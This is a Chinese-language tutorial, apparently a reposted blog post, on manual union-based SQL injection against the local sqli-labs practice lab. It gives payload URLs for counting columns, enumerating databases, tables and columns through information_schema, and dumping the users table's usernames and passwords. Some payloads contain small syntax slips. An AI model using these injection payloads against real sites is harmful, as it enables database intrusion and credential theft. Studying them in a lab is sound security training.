共计 2935 个字符,预计需要花费 8 分钟才能阅读完成。
这篇文章将为大家详细讲解有关 sql 注入之手工注入的示例分析,丸趣 TV 小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。
为了方便说明,我们还是用之前的数字型的注入点为例来进行说明。
得到字段总数
在前面的介绍中,我们已经知道在 http://localhost/sqlilabs/Less-2/?id=1id 是一个注入点。
后台的 SQL 语句的写法大致为
select username,password,[....] from table where id=userinput
那么我们通过使用 order by 的语句来判断 select 所查询字段的数目。
那么 payload 变为:
http://localhost/sqlilabs/Less-2/?id=1 order by 1/2/3/4....
当使用 order by 4 时程序出错,那么 select 的字段一共是 3 个。
得到显示位
在页面上会显示从 select 中选取的字段,我们接下来就是要判断显示的字段是哪几个字段。
使用如下的 payload(两者均可) 进行判断。
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,3
http://localhost/sqlilabs/Less-2/?id=1 and 1=2 union select 1,2,3
当使用个如上的 payload 时,页面的显示如下:
通过如上的页面显示就可以知道,页面中显示的是第 2 位和第 3 位的信息。
查选库
在知道了显示位之后,那么接下来就可以通过显示位来显示我们想知道的信息,如数据库的版本,用户信息等等。那么我们使用如下的 payload 就可以知道相关的信息。
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,version(),database()
此时页面的显示为:
可以看到在页面上就出现了数据库的版本信息和当前使用的数据库信息。
那么接下来我们通过这种方式知道数据库中所有的数据库的名称。
payload 如下:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 0,1 # 得到第一个库名
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 1,1 # 得到第二个库名
...
查选表名
由于 database() 返回的就是当前 web 程序所使用的数据库名,那么我们就利用 database() 来查询所有的表信息。当然在上一步中。我们也已经知道当前的 database 就是 security。
那么我们构造的 payload 如下:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
这样我们就得到当前数据库下所有的表名了。页面返回的结果是:
所以我们知道在当前的数据库中存在 4 张表,分别是 emails,referers,uagents,users。
查选列名
在知道了表名之后,接下来我们利用 information_schema.columns 就可以根据表名来获取当前表中所有的字段。
payload 如下:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name= users
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273(users 的十六进制)
页面的显示结果如下:
通过这个语句,我们就知道在 users 表中存在 USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,id,name,password 这些字段。但是我本地测试的测试的时候,这个存在一个问题,实际上在 security 数据库的 users 的表中,只有 id,username,password 这 3 个字段,其他的字段都是其他数据库的中 users 表的字段名。
通过上面的 payload,我们也同样可以知道在 emails,referers,uagents 中的字段名称。
但是有的时候后台的代码可能仅用了使用 where 子句,那么这个时候就无法通过 information_schema.coumns 来得到列名了,这个时候只能够根据你自己多年的黑客经验来进行猜解了。猜解的方法也是比较的简单,使用 exists 子句就可以进行猜解了。假设在我们已经知道了表名的情况下 (当然猜解表名也使用通过 exists 子句来完成)。
猜解的语句如下:
http://localhost/sqlilabs/Less-2/?id=1 and exists(select uname from users)
主要的语句就是 exists(select 需要猜解的列名 from users) 这种句式。如果在 users 表中不存在 uname 列名,则页面不会显示内容或者是直接出现 sql 的错误语句。
如下如所示:
下面这个就是猜解到了 users 表中存在的字段。
http://localhost/sqlilabs/Less-2/?id=1 and exists(select username from users)
猜测在 users 表中存在 username 列,上面的语句程序可以正常第返回结果,那么寿命在 users 表中确实存在 username 列名。
脱裤
在知道了当前数据库所有的表名和字段名之后,接下来我们就可以 dump 数据库中所有的信息了。比如我们下载当前 users 表中所有的数据。
可以使用如下的 payload:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username,password),3 from users
就可以得到 users 表中所有的 username 和 password 的数据了,通过这种方式也能够得到其他表中的数据了。
关于“sql 注入之手工注入的示例分析”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。